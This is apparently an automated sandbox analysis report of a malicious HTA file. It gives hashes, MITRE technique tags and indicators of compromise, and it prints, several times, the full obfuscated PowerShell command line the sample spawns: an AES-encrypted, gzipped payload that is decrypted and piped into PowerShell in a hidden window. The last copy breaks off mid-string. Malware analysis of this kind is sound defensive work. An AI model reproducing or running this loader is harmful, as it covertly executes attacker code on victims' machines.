598b36f688f03733f122a328177ed29b68d3b3a8f14ec281d13eabad59bb8254

General

Target

localinstupdater.hta
Size

1.2MB
MD5

1bab38a63bec0603d6244f5ca21688d8
SHA1

38ea9e0f83f90afdcc639e5f61b86a2b97125166
SHA256

598b36f688f03733f122a328177ed29b68d3b3a8f14ec281d13eabad59bb8254
SHA512

36232e4ca3b5b6eff5524088205dbc3b20554e5730e79d1d5f790e1970cbf67027bfbfe622b3a540458337c44f0740b7556265b9657376dcac197c7ed5acf14c
SSDEEP

3072:zZwbHBSr0Fty3VkZ6oaKIC5EmQhm0vIwPlfYiytP7hYsy:zCW0Fg320o71Qhm0vBPZYiyP7Gsy

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1468	powershell.exe
1468	powershell.exe
1132	powershell.exe
1928	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 1468	1752	mshta.exe	28
PID 1752 wrote to memory of 1468	1752	mshta.exe	28
PID 1752 wrote to memory of 1468	1752	mshta.exe	28
PID 1752 wrote to memory of 1468	1752	mshta.exe	28
PID 1468 wrote to memory of 1476	1468	powershell.exe	30
PID 1468 wrote to memory of 1476	1468	powershell.exe	30
PID 1468 wrote to memory of 1476	1468	powershell.exe	30
PID 1468 wrote to memory of 1476	1468	powershell.exe	30
PID 1476 wrote to memory of 1132	1476	cmd.exe	32
PID 1476 wrote to memory of 1132	1476	cmd.exe	32
PID 1476 wrote to memory of 1132	1476	cmd.exe	32
PID 1476 wrote to memory of 1132	1476	cmd.exe	32
PID 1476 wrote to memory of 1928	1476	cmd.exe	33
PID 1476 wrote to memory of 1928	1476	cmd.exe	33
PID 1476 wrote to memory of 1928	1476	cmd.exe	33
PID 1476 wrote to memory of 1928	1476	cmd.exe	33

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\localinstupdater.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $PIzPI = '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';$ehhjfnL = 'TnJTRUlhcGVqa0NQdFRhS1pGWVNaU3podk1jenV5ZlE=';$RMJoUfk = New-Object 'System.Security.Cryptography.AesManaged';$RMJoUfk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$RMJoUfk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$RMJoUfk.BlockSize = 128;$RMJoUfk.KeySize = 256;$RMJoUfk.Key = [System.Convert]::FromBase64String($ehhjfnL);$EjEnM = [System.Convert]::FromBase64String($PIzPI);$unPSSWoW = $EjEnM[0..15];$RMJoUfk.IV = $unPSSWoW;$kTLbNnifg = $RMJoUfk.CreateDecryptor();$DJCVkyXhB = $kTLbNnifg.TransformFinalBlock($EjEnM, 16, $EjEnM.Length - 16);$RMJoUfk.Dispose();$ZAqg = New-Object System.IO.MemoryStream( , $DJCVkyXhB );$sTIxOXDa = New-Object System.IO.MemoryStream;$RBKQKjEUt = New-Object System.IO.Compression.GzipStream $ZAqg, ([IO.Compression.CompressionMode]::Decompress);$RBKQKjEUt.CopyTo( $sTIxOXDa );$RBKQKjEUt.Close();$ZAqg.Close();[byte[]] $XihdlK = $sTIxOXDa.ToArray();$cOJoskR = [System.Text.Encoding]::UTF8.GetString($XihdlK);$cOJoskR | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $PIzPI = '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';$ehhjfnL = 'TnJTRUlhcGVqa0NQdFRhS1pGWVNaU3podk1jenV5ZlE=';$RMJoUfk = New-Object 'System.Security.Cryptography.AesManaged';$RMJoUfk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$RMJoUfk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$RMJoUfk.BlockSize = 128;$RMJoUfk.KeySize = 256;$RMJoUfk.Key = [System.Convert]::FromBase64String($ehhjfnL);$EjEnM = [System.Convert]::FromBase64String($PIzPI);$unPSSWoW = $EjEnM[0..15];$RMJoUfk.IV = $unPSSWoW;$kTLbNnifg = $RMJoUfk.CreateDecryptor();$DJCVkyXhB = $kTLbNnifg.TransformFinalBlock($EjEnM, 16, $EjEnM.Length - 16);$RMJoUfk.Dispose();$ZAqg = New-Object System.IO.MemoryStream( , $DJCVkyXhB );$sTIxOXDa = New-Object System.IO.MemoryStream;$RBKQKjEUt = New-Object System.IO.Compression.GzipStream $ZAqg, ([IO.Compression.CompressionMode]::Decompress);$RBKQKjEUt.CopyTo( $sTIxOXDa );$RBKQKjEUt.Close();$ZAqg.Close();[byte[]] $XihdlK = $sTIxOXDa.ToArray();$cOJoskR = [System.Text.Encoding]::UTF8.GetString($XihdlK);$cOJoskR | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe $PIzPI = 'AAAAAAAAAAAAAAAAAAAAABKfpXb6v7rc7+/fBKu62i+hfIIJuYzu6f5xWknmQCxthlt72NaM2lsLgAfwSoR2zvCOrDUvTlh5i+aXYX8c25KM9ysnycbatqkS1IG+DfX81YhWy74r0ULir4tIsdM/etlkUSgbG5yLXdT8EC0FP+Mqsrn/9Kpr8PbPRd5n7waoFU88d6fO5TpKhLe99OjlKfZz6D83VXiLhSNOi3s9xEFY90M+9o+/gifprmrfLAyvpGKve4eK+BWy4OVKb6e9RvuwDeXr+7RjQKIcB4k415t+KGW99GZMHPRGILvKDi7xo+rrVdtZJ5I6NT0o5bUU1STicRetVxRM8H7S9Vhn3V59WDqOc1NCtilkQiK4JAnqCz3AUFnouJfi+THyCGWqFF+n32MFUCpAkCgaGEjr3nCyzQsXd/BV4q/rLMUzYlDTMgZzNtq9T4RRJwDDhFEUqO+2X0eTdGfuHlxfmC4Gcd/BiqtYfPJ43K9GSLkk++hddIigNLYVRgyT0IGV56jFGELnzpjt6UhXmpG+qbDz0IhWGeO75PqobV8UZci5pcwyD0ISAgLu6cBLluHuMxMqyr6qssa+8V+KbICD4+hWTJVGntSRU8tuC6NdCbF4WavYHYhvysAVBjfCGGjlVw/PqP8aGJCU0hQ3ytFFS4dqmpLl1lUIvkmuB+Dm/Jct3QAxXw64OIZiU3tbg4FKH5gMIPSl8l3OI+DzY3TA3P2Sdyj0F9+sqZ4BQghv5t/bJw2dWO/5ckjafEldfIAY+hkYlB2JDbjtQAe7nwBgUtYmtn5KZQEMYowerCNKBPqAaHtXH5fufBaMWP0AfbfYoiUxgLjOgQc87qVDE+uqGkKRQVgifEVDDSbCI9xvoIhjDlYBXRpOo8twuI6i1vN4jgy6+ADI/abm63FhkLuHGmXKZtq0+ywYAultNpnX3tdOgmvgIW7n+iKRFSODjlOn6cRgmyQ/qZFe3XgfvuePFdce18CWExNRgCJqeLlwjB+abT1Xjx2YoHpRCcEOiKen8XWmhKFRqZ1rKn0JMiskzz/1zSteDSLIGEPWxtB6jZKPbYI/sOPfuOw1YMAODfjOY79pxpCDuJwkr5N4EIfybYuLQ0j7aXpqOUA2wPU29Y+ewyhdTHJd2xm09oQxhY3tYLWdaene/FqpmPXGeUkdL1aQr8DDp+klesnZA5ay7HAt2VjaBQai0E7rvRoaM4FyGtt8cZv82VVDN4MSJMMvB0z/czcuEuvOcwvW1aIQ5OSwf7gj1Oy3TiEN2lJb3wr1rhw9WxwdcoC2GEzDXL4myL7iB3+Hl7NdV2uM/uYQVNtWEIUgoDaHJFwXR1trIcOxlD4AwXLskeub2u7Homh9xbCqcfYspgJrcrE1cj+M6FWrRtW21V/7nrs2CCJkcuW6BqP2wcE8Na4DDJ2IoZ2uw4JM2zle/DzkjnsmUF0biyfIot6P9ckOCnPEn9HKlxwXpLgLYHDD+wpniDnjDo3PLR8rqpB01aG1yVHVj4iZ3pr+wH8OrPNhao1nR+xuV9Jldxqrbc2XG35zEKlyMgq41lPXq5MxSHhmbLypAbejznebT5uYptbKKDzkYBMxHAJqf/aAw6gi7pIOQAnY/Z7ezspDdtzv18LVXXh8GgVR66RI24CYHVy0nITJ4kiX6NKdNKsMLeoUPwKucj+Jd6347Xb1xaQ7OQoMpKSj8c/mejiqWiFonRnRcCct9FpvV+3+fliVOquxsmPEsXuYwLZ7SfXTOCSAb28fCxaqbv7/B61P7ojSYjDd33ggpWyaDd6h2iC1ZxvB0c4cl2+HSESn9vKO8nxmOU/3R4CNngGHsqX7RUinT/CcgjAUu61Z/pYQPiIDZsbIvc3LCkUbQ1yrZ3ciJh5PMBk2KD5fVeVCBpoPZrHvIiIWoPJvNMR4OV86FP7pyFBEaY4qroJO9Iv1npwCgJWMA4tB1NES7nmDiB6v1MHkPFbThtzOtEvTPEsl2BdZ8GH93OYa0JoodecxpfSJeFIsqoUkXkQ/ovOS1INBNvTtV9duSmVG9JBYT2F/SltPOZQ+3hJD0uPK7OrlXIFGBM5gy8WSAQsQwYrr3BzqANx/7rIBb5Y/1+muHOzCnXhPt6Hk4MiEbNfkw2U3OWkrxPJXWxaiD+1Sv7RLTioGY/JHtZQ9ubdXK/eLGm0C3haNjltj30JQnyE5u774Cj1N0aVbHbE3QpF/muJPAp0nl3CT1pYffripdij4X6e86EBJuJPRAtB2JGb6x1l+80063MP/xRjYfM95uaMCeDRZ0R2g547y5BoB7JEFAVLH8dXNH7ytkXYKOdvkstiG9ds/3K5zPKK12zgXiAXnSOxvpjKN5h7/YBwfbuzKi9JbFYpDKO9KH1nuPQCDsSeHEednRoyweg1FXo1DnL3gLjz3xnLxJX+Lf0FZ9O50KiUkf6tChE5X8Ehhp30JrsphTDVcMxnfuFZYXGstpBb5WWRLzKdz8Y+OWoyHu1w5M2nMhyipGvJbhwK9ebCEfv3jeUirNcXwSzvjL2l26CAvh9eCMO3pxZgsbGBTnFuKI5q0tOdseoJVR8uKPgKNoeccjaE/MBebL1jSaNv+1aLAaO1UNb/fO1G7ztoHcDxAbnWpVnUdG1b62VncjdjnU8emsugtznP0j/hQiB6KhdxdJEvnxL284+bccRjsa9xkk+X6BKiNEYQMnxCGXZzFKnourLr4U1Qr+009acDTE73lVV5KZ3lJg3Q7tgQOBre0W